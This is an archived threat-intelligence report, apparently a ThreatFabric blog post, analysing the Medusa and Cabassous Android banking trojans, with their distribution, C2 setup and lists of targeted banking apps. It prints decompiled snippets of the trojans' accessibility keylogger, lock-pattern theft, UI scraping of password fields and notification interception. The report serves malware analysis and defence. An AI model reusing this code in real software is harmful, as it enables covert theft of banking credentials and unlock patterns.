{
	"id": "96c619d5-d7e6-4abd-b2d6-4895bd36b124",
	"created_at": "2026-04-06T01:30:38.705356Z",
	"updated_at": "2026-04-10T03:20:03.219153Z",
	"deleted_at": null,
	"sha1_hash": "aec37b3face55538e0e848b047e2584dd5f2661c",
	"title": "Partners-in-crime: Medusa and Cabassous attack banks side-by-side",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 102258,
	"plain_text": "Partners-in-crime: Medusa and Cabassous attack banks side-by-side\r\nPublished: 2024-10-01 · Archived: 2026-04-06 00:17:33 UTC\r\nMedusa: a marriage partner as gunslinger\r\nThe success of Cabassous’ (aka Flubot) distribution campaigns, that have been “SMiShing” different regions all over the\r\nworld for almost a year attracted the attention of another threat actor. Just like for Anatsa’s campaigns spotted by\r\nThreatFabric in May 2020, another powerful mobile banking Trojan, Medusa, is now being distributed through the same\r\nSMiShing service as Cabassous.\r\nOur Threat Intelligence shows that Medusa followed Cabassous with exactly the same app names, package names and\r\nsimilar icons:\r\nKeylogger\r\nMedusa authors implemented a simple accessibility-based keylogging, allowing the bot to get access to UI events, such as\r\nclicks, text inputs and focus events of all application on the infected device. This feature allows the actors to collect much\r\nmore than only user input, as it can also track actions performed on the UI and visualize the content shown in the\r\napplications. This enables the attackers to gain further insights into victim’s behavior and grants them ability to steal\r\ncredentials without having to resort to the use of phishing attacks.\r\nThe code powering the keylogger (including stealing the lock pattern) is visible in following snippet (simplified for\r\nunderstanding convenience):\r\n try {\r\n logTimestamp = new SimpleDateFormat(\"MM/dd/yyyy, HH:mm:ss z\", Locale.US).format(Calendar.getInstance().getTime());\r\n CharSequence packageName = accessibilityEvent.getPackageName();\r\n viewIdResourceName = \"\";\r\n logPackageName = packageName == null ? 
\"\" : accessibilityEvent.getPackageName().toString();\r\n worker.stealPattern(v17.getRootInActiveWindow());\r\n } catch (Exception unused_ex) {}\r\n try {\r\n logText = accessibilityEvent.getText().toString();\r\n viewIdResourceName = accessibilityEvent.getSource().getViewIdResourceName();\r\n } catch (Exception unused_ex) {}\r\n String logText = logText;\r\n String viewIdResourceName = viewIdResourceName;\r\n try {\r\n int eventType = accessibilityEvent.getEventType();\r\n if (eventType == 1) {\r\n logEventType = \"click\";\r\n }\r\n if (eventType == 8) {\r\n logEventType = \"focus\";\r\n }\r\n if (eventType == 16) {\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 1 of 12\n\nlogEventType = \"text\";\r\n }\r\n if (eventType == 0x2000) {\r\n logEventType = \"selchange\";\r\n }\r\n v17.sendKeylog(logPackageName, logTimestamp, logEventType, logText, viewIdResourceName);\r\n } catch (Exception unused_ex) {}...public void stealPattern(AccessibilityNodeInfo arg13) {\r\n String text;\r\n if (arg13.getPackageName().equals(\"com.android.systemui\")) {\r\n for (Object v0: arg13.findAccessibilityNodeInfosByViewId(\"com.android.systemui:id/lockPatternView\")) {\r\n AccessibilityNodeInfo accessibilityNodeInfo = (AccessibilityNodeInfo) v0;\r\n JSONArray jsonArray = new JSONArray();\r\n int index;\r\n for (index = 0; index \u003c accessibilityNodeInfo.getChildCount(); ++index) {\r\n if (!accessibilityNodeInfo.getChild(index).isClickable()) {\r\n JSONObject logAccessibilityNodeInfo = new JSONObject();\r\n Rect bounds = new Rect();\r\n accessibilityNodeInfo.getChild(index).getBoundsInScreen(bounds);\r\n try {\r\n text = accessibilityNodeInfo.getChild(index).getText().toString();\r\n } catch (Exception unused_ex) {\r\n text = \"\";\r\n }\r\n try {\r\n logAccessibilityNodeInfo.put(\"t\", bounds.top);\r\n logAccessibilityNodeInfo.put(\"l\", bounds.left);\r\n logAccessibilityNodeInfo.put(\"b\", bounds.bottom);\r\n 
logAccessibilityNodeInfo.put(\"r\", bounds.right);\r\n logAccessibilityNodeInfo.put(\"k\", text);\r\n jsonArray.put(logAccessibilityNodeInfo);\r\n } catch (JSONException unused_ex) {}\r\n }\r\n }\r\n if (jsonArray.length() \u003c= 0) {\r\n continue;\r\n }\r\n this.sendKeylog(accessibilityNodeInfo.getPackageName().toString(), \"\", \"pattern\", jsonArray.toString(), \"\");\r\n }\r\n }\r\n }\r\nAccessibility scripting\r\nAuthors of Medusa also implemented a simple but powerful scripting engine that is able to execute a sequence of\r\ncommands on the infected device. Combined with the media streaming feature, this provides the attackers with limited\r\nbut powerful RAT functionalities that allow them to interact with the infected device while monitoring it at the same\r\ntime.\r\nThe list of available actions is shown below:\r\nCommands Description\r\nhome_key Performs HOME global action\r\nges Executes a specified gesture on the screen of the device\r\nfid_click Clicks on the UI element with the specified ID\r\nsleep Sleeps (waits) for the specified number of microseconds\r\nrecent_key Shows overview of the recent apps\r\nscrshot_key Performs TAKE_SCREENSHOT global action\r\nnotification_key Opens the active notifications\r\nlock_key Locks the screen\r\nback_key Performs BACK global action\r\ntext_click Clicks on the UI element that has specified text displayed\r\nfill_text Not implemented\r\nAccessibility events logging\r\nAnother rather powerful feature of the Medusa banking trojan is event logging. On a special command from the C2, Medusa\r\nstarts to recursively collect the information about the active window starting from the root node. 
Information of interest includes,\r\nbut is not limited to:\r\nnode bounds in screen coordinates (position of elements in the UI),\r\ntext of the node (the text inside an element),\r\nwhether this node is categorized as password (if the element is a field of type “password”)\r\nHaving collected all this data, the actor is able to get a better understanding of the interface of different applications and\r\ntherefore implement relevant scenarios for the accessibility scripting feature. Moreover, it allows actor(s) to have deeper\r\ninsight into the applications the victim uses and their typical usage, while also allowing TA(s) to intercept some private\r\ndata.\r\nThe following snippet shows the code that collects the information about the active window by going through its nodes:\r\npublic static JSONObject getInfoAboutNode(AccessibilityNodeInfo node, int arg7) {\r\n JSONObject jsonNodeInfo = new JSONObject();\r\n if (node == null) {\r\n return jsonNodeInfo;\r\n }\r\n try {\r\n ...\r\n if (node.getText() != null) {\r\n jsonNodeInfo.put(\"t\", node.getText());\r\n }\r\n if (node.getContentDescription() != null) {\r\n jsonNodeInfo.put(\"cd\", node.getText());\r\n }\r\n if (node.getViewIdResourceName() != null) {\r\n jsonNodeInfo.put(\"r\", node.getViewIdResourceName());\r\n }...\r\n if (node.isPassword()) {\r\n jsonNodeInfo.put(\"pass\", true);\r\n }...\r\n if (node.isVisibleToUser()) {\r\n jsonNodeInfo.put(\"vis\", true);\r\n }\r\n if (node.getChildCount() \u003e 0) {\r\n JSONArray jsonChildNodeInfo = new JSONArray();\r\n int childCounter = 0;\r\n while (childCounter \u003c node.getChildCount()) {\r\n AccessibilityNodeInfo childNode = node.getChild(childCounter);\r\n ++childCounter;\r\n jsonChildNodeInfo.put(WorkerAccessibilityService.getInfoAboutNode(childNode, arg7 + 1));\r\n }\r\n jsonNodeInfo.put(\"chi\", jsonChildNodeInfo);\r\n }\r\n }\r\n catch (Exception unused_ex) {}\r\nThreat actor 
\u0026 backend infrastructure\r\nWe have substantial evidence that indicates that the threat actor behind Medusa is from Turkey. In addition to the fact\r\nthat the actor has spoken Turkish on underground forums, ThreatFabric analysts have collected IPs, browser details, and\r\nother threat intelligence to corroborate this initial hypothesis.\r\nThe panel used by actors to control Medusa is referred to as Ankatras. ThreatFabric analysts were able to retrieve the\r\ninformation about the FLUDHL campaign, which in only 24 days was able to infect 1784 devices.\r\nMedusa has multiple botnets. The samples seen in side-by-side campaigns with Cabassous are identified by the actors\r\nthemselves with the tags FLUVOICE, FLUFLASH and FLUDHL (possibly as a reference to the corresponding\r\nCabassous/Flubot campaigns). All these botnets use two separate C2 backends to manage bots. The first is the fronting\r\nC2, to which bots connect, while the second is the actual bot operator panel, used by operators to manage their\r\ndifferent botnets.\r\nThe most recent campaigns have more botnet tags as Medusa’s TA seems to have once again switched to another region.\r\nThe C2s remain the same, while the botnet tags are now “VIDEO”, “CRICKET”, “SIFIRIBNELIK” (translated from\r\nTurkish as “ZERO FAKE”), “PURO”. Based on the application names and masquerade used, we believe these campaigns\r\nto target mostly users from USA, Canada and Turkey.\r\nEvery minute the malware sends statistics about the notifications received to the C2. As a response it might receive a\r\ntemplate string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing\r\nCabassous authors to arbitrarily change notification content. 
The code snippet below shows its implementation in\r\nthe latest Cabassous samples:\r\npublic void onNotificationPosted(StatusBarNotification sbn) {\r\n super.onNotificationPosted(sbn);\r\n ...\r\n String title = sbn.getNotification().extras.getString(\"android.title\");\r\n String text = sbn.getNotification().extras.getString(\"android.text\");\r\n String packageName = sbn.getPackageName();\r\n Long timeout = (Long) p91564b42.notificationsTimeLogger.get(packageName);...\r\n if (v2 != null \u0026\u0026 (p91564b42.notifResponse != null \u0026\u0026 !p91564b42.notifResponse.isEmpty())) {\r\n try {\r\n if (((long) timeout) == 0L) {\r\n p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(System.currentTimeMillis()));\r\n Integer sent2package = (Integer) p91564b42.notificationsCounter.get(packageName);\r\n if (sent2package == null) {\r\n sent2package = (int) 0;\r\n }\r\n p91564b42.notificationsCounter.put(packageName, Integer.valueOf(((int) sent2package) + 1));\r\n String appName = pd8474166.getAppName(this, packageName);\r\n String v8 = p91564b42.notifResponse.replaceAll(\"%APP%\", appName);\r\n p91564b42.notifResponse = v8;\r\n String v8_1 = v8.replaceAll(\"%TITLE%\", title);\r\n p91564b42.notifResponse = v8_1;\r\n p91564b42.notifResponse = v8_1.replaceAll(\"%TEXT%\", text);\r\n v2.f(this.getApplicationContext(), p91564b42.notifResponse);\r\n } else if (System.currentTimeMillis() - ((long) timeout) \u003e 2000L) {\r\n p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(0L));\r\n }\r\n } catch (PendingIntent.CanceledException v1) {}\r\n }\r\n if (p7e1b9eb1.isInterceptingNotif()) {\r\n p53cba4f5.sendToC2(\"LOG,NOTIF,\" + title + \": \" + text, Boolean.valueOf(true));\r\n this.cancelNotification(sbn.getKey());\r\n }\r\n}\r\nWe believe that this previously unseen capability can be used by actors to sign fraudulent transactions on the victim’s behalf,\r\nthus making 
notifications a non-reliable authentication/authorization factor on an infected device. Another potential\r\nabuse of this functionality could be to respond to social application notifications with malicious phishing links.\r\nConsidering the popularity of this type of app and the strong focus of Cabassous’ TA on distribution tactics, this could\r\neasily be the main MO behind this new Notification Direct Reply Abuse.\r\nConclusion\r\nMore and more actors follow Cabassous’ success in distribution tactics, appropriating masquerading techniques and using\r\nthe same distribution service. Despite the fact that Medusa is not extremely widespread at the moment, we do see an\r\nincrease in volume of campaigns and a sufficiently greater number of different campaigns.\r\nAt the same time, Cabassous keeps evolving, introducing new features and making another step towards being able to\r\nperform on-device fraud. This innovative feature (for banking malware) provides Cabassous’ actors with improved\r\ncontrol over intercepted notifications.\r\nThe evolution of malware families shows that 2FA techniques might not be sufficient to ensure the origin of a transaction. It\r\nrequires deeper TI in combination with a solution that is able to detect malicious behaviour on customers’ devices.\r\nHow we help our customers\r\nThreatFabric makes it easier than it has ever been to run a secure mobile payments business. With the most advanced\r\nthreat intelligence for mobile banking, financial institutions can build a risk-based mobile security strategy and use this\r\nunique knowledge to detect fraud-by-malware on the mobile devices of customers in real-time.\r\nTogether with our customers and partners, we are building an easy-to-access information system to tackle the ever\r\ngrowing threat of mobile malware targeting the financial sector. 
We would especially like to thank the Cyber Defence Alliance\r\n(CDA) and FS-ISAC for collaborating and proactively sharing knowledge and information across the financial sector to\r\nfight cyber-threats.\r\nThreatFabric has partnerships with TIPs all over the world.\r\nIf you want to request a free trial of our MTI-feed, or want to test our own MTI portal for 30 days, feel free to contact us\r\nat: sales@threatfabric.com\r\nIf you want more information on how we detect mobile malware on mobile devices, you can directly contact us\r\nat: info@threatfabric.com\r\nAppendix: Targeted apps\r\nMedusa.B Targets for Flu botnet tags\r\nPlease note that targets differ per botnet. The Flu botnet tags focus on US, ES and TR; Medusa has its own tags for Canada, which\r\ncontain Canadian banks as targets.\r\nPackage Name App Name\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\ncom.woodforest Woodforest Mobile Banking\r\ncom.teb CEPTETEB\r\ncom.suntrust.mobilebanking SunTrust Mobile App\r\nes.univia.unicajamovil UnicajaMovil\r\nes.cm.android Bankia\r\ncom.ally.MobileBanking Ally Mobile\r\ncom.tmobtech.halkbank Halkbank Mobil\r\ncom.imaginbank.app imaginBank - Your mobile bank\r\nfinansbank.enpara Enpara.com Cep Şubesi\r\ncom.finansbank.mobile.cepsube QNB Finansbank Mobile Banking\r\ncom.tdbank TD Bank (US)\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\ncom.schwab.mobile Schwab Mobile\r\nwww.ingdirect.nativeframe ING España. 
Banca Móvil\r\ncom.pozitron.iscep İşCep - Mobile Banking\r\ncom.ziraat.ziraatmobil Ziraat Mobile\r\ncom.citi.citimobile Citi Mobile®\r\nes.openbank.mobile Openbank – banca móvil\r\nbu.bir.test.uygulamasi TA testing app\r\ncom.citizensbank.androidapp Citizens Bank Mobile Banking\r\ncom.kuveytturk.mobil Kuveyt Türk\r\ncom.clairmail.fth Fifth Third Mobile Banking\r\ncom.rsi ruralvía\r\nes.ibercaja.ibercajaapp Ibercaja\r\ncom.bankinter.empresas Bankinter Empresas\r\ncom.botw.mobilebanking Bank of the West Mobile\r\ncom.denizbank.mobildeniz MobilDeniz\r\ncom.magiclick.odeabank Odeabank\r\norg.ncsecu.mobile SECU\r\ncom.infonow.bofa Bank of America Mobile Banking\r\ncom.mcom.firstcitizens First Citizens Mobile Banking\r\ncom.bmoharris.digital BMO Digital Banking\r\ncom.zellepay.zelle Zelle\r\ncom.vakifbank.mobile VakıfBank Mobil Bankacılık\r\ncom.compasssavingsbank.mobile Compass Savings Bank\r\ncom.ykb.android Yapı Kredi Mobile\r\ncom.morganstanley.clientmobile.prod Morgan Stanley Wealth Mgmt\r\ncom.wf.wellsfargomobile Wells Fargo Mobile\r\ncom.mfoundry.mb.android.mb_136 People’s United Bank Mobile\r\ntr.com.hsbc.hsbcturkey.uk HSBC Turkiye\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\nes.bancosantander.apps Santander\r\ncom.key.android KeyBank Mobile\r\ncom.navyfederal.android Navy Federal Credit Union\r\ncom.mtb.mbanking.sc.retail.prod M\u0026T Mobile Banking\r\ncom.etrade.mobilepro.activity E*TRADE: Invest. Trade. 
Save.\r\ncom.akbank.android.apps.akbank_direkt Akbank\r\ncom.usaa.mobile.android.usaa USAA Mobile\r\ncom.pnc.ecommerce.mobile PNC Mobile\r\ncom.garanti.cepsubesi Garanti BBVA Mobile\r\ncom.americanexpress.android.acctsvcs.us Amex\r\ncom.ziraatkatilim.mobilebanking Katılım Mobil\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.discoverfinancial.mobile Discover Mobile\r\ncom.konylabs.capitalone Capital One® Mobile\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.kutxabank.android Kutxabank\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nCabassous.D Targets\r\nPackage Name App Name\r\nau.com.cua.mb CUA Mobile Banking\r\nau.com.bankwest.mobile Bankwest\r\nco.zip Zip - Shop Now, Pay Later\r\norg.bom.bank Bank of Melbourne Mobile Banking\r\nuk.co.tescomobile.android Tesco Mobile\r\ncom.bankofqueensland.boq BOQ Mobile\r\nuk.co.tsb.newmobilebank TSB Mobile Banking\r\ncom.coinbase.android Coinbase – Buy \u0026 Sell Bitcoin. 
Crypto Wallet\r\norg.stgeorge.bank St.George Mobile Banking\r\nuk.co.mbna.cardservices.android MBNA - Card Services App\r\nuk.co.santander.santanderUK Santander Mobile Banking\r\ncom.adcb.bank ADCB\r\ncom.grppl.android.shell.BOS Bank of Scotland Mobile Banking: secure on the go\r\nuk.co.hsbc.hsbcukmobilebanking HSBC UK Mobile Banking\r\nau.com.suncorp.SuncorpBank Suncorp Bank\r\nau.com.macquarie.banking Macquarie Mobile Banking\r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely\r\ncom.barclays.android.barclaysmobilebanking Barclays\r\ncom.cbd.mobile CBD\r\ncom.fusion.banking Bank Australia app\r\ncom.grppl.android.shell.CMBlloydsTSB73 Lloyds Bank Mobile Banking: by your side\r\ncom.vipera.ts.starter.MashreqAE Mashreq UAE\r\norg.banksa.bank BankSA Mobile Banking\r\norg.banking.bom.businessconnect Bank of Melbourne Business App\r\nau.com.newcastlepermanent NPBS Mobile Banking\r\ncom.fusion.beyondbank Beyond Bank Australia\r\nau.com.nab.mobile NAB Mobile Banking\r\ncom.rbs.mobile.android.natwest NatWest Mobile Banking\r\ncom.commbank.netbank CommBank\r\ncom.anz.android.gomoney ANZ Australia\r\norg.banking.stg.businessconnect St.George Business App\r\ncom.virginmoney.cards Virgin Money Credit Card\r\nau.com.amp.myportfolio.android My AMP\r\nau.com.mebank.banking ME Bank\r\nenbd.mobilebanking Emirates NBD\r\ncom.cooperativebank.bank The Co-operative Bank\r\norg.westpac.bank Westpac Mobile Banking\r\ncom.rbs.mobile.android.rbs Royal Bank of Scotland Mobile Banking\r\nnz.co.kiwibank.mobile Kiwibank Mobile Banking\r\ntsb.mobilebanking TSB Bank Mobile Banking\r\nco.uk.Nationwide.Mobile Nationwide Banking App\r\nau.com.rams.RAMS myRAMS\r\norg.westpac.col Westpac Corporate Mobile\r\ncom.grppl.android.shell.halifax Halifax: the banking app that gives you extra\r\nnz.co.asb.asbmobile ASB Mobile Banking\r\nau.com.commbank.commbiz.prod 
CommBiz\r\ncom.bendigobank.mobile Bendigo Bank\r\norg.banking.bsa.businessconnect BankSA Business App\r\ncom.nearform.ptsb permanent tsb\r\ncom.greater.Greater Greater Bank\r\nnz.co.anz.android.mobilebanking ANZ goMoney New Zealand\r\nuk.co.metrobankonline.mobile.android.production Metro Bank\r\nau.com.ubank.internetbanking UBank Mobile Banking\r\ncom.anz.transactive.global ANZ Transactive - Global\r\nau.com.hsbc.hsbcaustralia HSBC Australia\r\nnz.co.westpac Westpac One (NZ) Mobile Banking\r\nSource: https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html"
	],
	"report_names": [
		"partners-in-crime-medusa-cabassous.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439038,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.pdf",
		"text": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.txt",
		"img": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.jpg"
	}
}